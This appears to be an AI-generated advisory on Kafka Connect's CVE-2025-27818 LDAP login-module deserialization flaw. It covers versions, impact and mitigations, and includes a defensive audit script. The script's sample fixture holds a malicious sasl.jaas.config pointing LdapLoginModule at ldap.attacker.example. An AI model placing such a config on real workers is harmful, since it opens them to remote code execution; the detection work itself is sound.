CVE-2025-27818
Java vulnerability analysis and mitigation

Overview

A vulnerability (CVE-2025-27818) has been identified in Apache Kafka, affecting versions 2.3.0 through 3.9.0. Exploitation requires AlterConfigs access to the cluster resource or to a Kafka Connect worker, together with the ability to create or modify connectors that supply an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol. Supplying such a configuration has been possible on Kafka clusters since Apache Kafka 2.0.0 (Kafka Connect 2.3.0) (Apache CVE List, OSS Security).

Technical details

An authenticated operator can set the sasl.jaas.config property of any of a connector's Kafka clients to 'com.sun.security.auth.module.LdapLoginModule' through the override properties producer.override.sasl.jaas.config, consumer.override.sasl.jaas.config and admin.override.sasl.jaas.config, which the worker strips of their prefix and passes to the connector's embedded producer, consumer and admin clients. When the client performs its JAAS login, the login module connects to an LDAP server chosen by the attacker and deserializes the LDAP response, so an attacker who controls that server can trigger Java deserialization gadget chains on the Kafka Connect worker (Apache CVE List).

Impact

When successfully exploited, the vulnerability leads to unrestricted deserialization of untrusted data, or to remote code execution (RCE) when suitable gadgets are present on the classpath. The exposure is greatest from Apache Kafka 3.0.0 onward, because the default connector client config override policy of Kafka Connect was changed so that out-of-the-box workers accept these properties in connector configurations; before 3.0.0 the overrides are only accepted if the worker was reconfigured with a policy that permits them (Apache CVE List).

Mitigation and workarounds

Apache Kafka 3.9.1 and 4.0.0 introduce a system property, -Dorg.apache.kafka.disallowed.login.modules, that disables the listed login modules in SASL JAAS configurations. By default, 'com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule' are disabled in Apache Kafka Connect 3.9.1/4.0.0; on 3.9.0 and earlier the property is not honoured, so upgrading is the primary fix. Users are also advised to validate connector configurations and allow only trusted LDAP configurations, and to examine connector dependencies for vulnerable versions, upgrading the connector or the affected dependency or removing the connector. In addition, Kafka Connect users can implement their own connector client config override policy, referenced from the worker's connector.client.config.override.policy property, to control which Kafka client properties may be overridden in a connector configuration and which may not (Apache CVE List).
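The following Python script is an added example, not code from the Apache Kafka project or from this report. It applies the override mechanism described under Technical details and the validation advice above to a Kafka Connect worker: it resolves the producer.override., consumer.override. and admin.override. prefixes the way the worker does, parses the resulting sasl.jaas.config values to find the login modules they name, flags any module on the 3.9.1/4.0.0 default disallowed list, and reads an explicit -Dorg.apache.kafka.disallowed.login.modules value out of a worker's JVM options. The sample REST response, connector names, hostnames and credentials are constructed for the example.

```python
"""Audit Kafka Connect connector configs for SASL JAAS overrides that reach a
dangerous login module (the CVE-2025-27818 pattern). Added example, not Apache
Kafka project code; all sample data below is constructed."""
import json
import re
from typing import Dict, FrozenSet, List, Optional

# Login modules that Kafka Connect 3.9.1 / 4.0.0 disable by default through
# the -Dorg.apache.kafka.disallowed.login.modules system property.
DEFAULT_DISALLOWED_LOGIN_MODULES: FrozenSet[str] = frozenset({
    "com.sun.security.auth.module.JndiLoginModule",
    "com.sun.security.auth.module.LdapLoginModule",
})

# The worker strips these prefixes from connector properties to build the
# config of the connector's embedded producer, consumer and admin clients.
CLIENT_OVERRIDE_PREFIXES = {
    "producer": "producer.override.",
    "consumer": "consumer.override.",
    "admin": "admin.override.",
}

# One JAAS entry: <LoginModuleClass> <flag> [option=value ...] ;
_JAAS_ENTRY_RE = re.compile(
    r"^\s*(?P<module>[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*)\s+"
    r"(?:required|requisite|sufficient|optional)\b",
    re.IGNORECASE,  # JAAS control flags are case-insensitive
)
_DISALLOWED_PROP_RE = re.compile(r"-Dorg\.apache\.kafka\.disallowed\.login\.modules=(\S*)")


def login_modules(jaas_config: str) -> List[str]:
    """Return the login module class names declared in a sasl.jaas.config value."""
    modules = []
    for entry in jaas_config.split(";"):
        match = _JAAS_ENTRY_RE.match(entry)
        if match:
            modules.append(match.group("module"))
    return modules


def resolve_client_overrides(connector_config: Dict[str, str]) -> Dict[str, Dict[str, str]]:
    """Map each client type to the properties the connector overrides for it,
    with the '<client>.override.' prefix removed, as the worker does."""
    resolved: Dict[str, Dict[str, str]] = {client: {} for client in CLIENT_OVERRIDE_PREFIXES}
    for key, value in connector_config.items():
        for client, prefix in CLIENT_OVERRIDE_PREFIXES.items():
            if key.startswith(prefix):
                resolved[client][key[len(prefix):]] = value
    return resolved


def audit_connector(name: str, config: Dict[str, str],
                    disallowed: FrozenSet[str] = DEFAULT_DISALLOWED_LOGIN_MODULES) -> List[str]:
    """One finding per client whose overridden sasl.jaas.config names a
    disallowed login module; an empty list means the connector is clean."""
    findings = []
    for client, props in resolve_client_overrides(config).items():
        for module in login_modules(props.get("sasl.jaas.config", "")):
            if module in disallowed:
                findings.append(f"{name}: {client}.override.sasl.jaas.config uses {module}")
    return findings


def audit_connectors_response(expand_info_json: str,
                              disallowed: FrozenSet[str] = DEFAULT_DISALLOWED_LOGIN_MODULES) -> List[str]:
    """Audit the JSON body returned by GET /connectors?expand=info on a worker."""
    findings: List[str] = []
    for name, entry in json.loads(expand_info_json).items():
        findings.extend(audit_connector(name, entry["info"]["config"], disallowed))
    return findings


def disallowed_modules_from_jvm_opts(jvm_opts: str) -> Optional[FrozenSet[str]]:
    """Explicit disallowed-module list from a worker's JVM options (e.g. KAFKA_OPTS).
    None means the property is absent: on 3.9.1/4.0.0 the built-in default then
    applies, on 3.9.0 and earlier nothing is blocked."""
    match = _DISALLOWED_PROP_RE.search(jvm_opts)
    if match is None:
        return None
    return frozenset(m.strip() for m in match.group(1).split(",") if m.strip())


# Constructed sample of GET /connectors?expand=info: one connector points its
# producer at an attacker-chosen LDAP server, the other uses a normal PLAIN login.
SAMPLE_EXPAND_INFO = json.dumps({
    "ldap-source": {"info": {"name": "ldap-source", "type": "source", "tasks": [], "config": {
        "connector.class": "org.apache.kafka.connect.file.FileStreamSourceConnector",
        "topic": "events",
        "producer.override.security.protocol": "SASL_PLAINTEXT",
        "producer.override.sasl.mechanism": "PLAIN",
        "producer.override.sasl.jaas.config":
            "com.sun.security.auth.module.LdapLoginModule required "
            'userProvider="ldap://ldap.attacker.example:389/ou=People,dc=example,dc=com";',
    }}},
    "plain-sink": {"info": {"name": "plain-sink", "type": "sink", "tasks": [], "config": {
        "connector.class": "org.apache.kafka.connect.file.FileStreamSinkConnector",
        "topics": "events",
        "consumer.override.sasl.jaas.config":
            "org.apache.kafka.common.security.plain.PlainLoginModule required "
            'username="svc-sink" password="changeit";',
    }}},
})

if __name__ == "__main__":
    for finding in audit_connectors_response(SAMPLE_EXPAND_INFO):
        print("FINDING:", finding)
    print("explicit disallowed list:", disallowed_modules_from_jvm_opts("-Xmx2g"))
```

Run audit_connectors_response over the body of GET /connectors?expand=info from every worker in the cluster, and pass each worker's KAFKA_OPTS to disallowed_modules_from_jvm_opts; a None result on a 3.9.1/4.0.0 worker means the built-in default list applies, while on 3.9.0 or earlier the connector-level check is the only control until the upgrade. The same rule enforced at admission time is a custom connector client config override policy: a class implementing org.apache.kafka.connect.connector.policy.ConnectorClientConfigOverridePolicy, named in the worker's connector.client.config.override.policy property, that returns an error for any sasl.jaas.config override naming a module outside an allow list.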

This report was generated using AI.
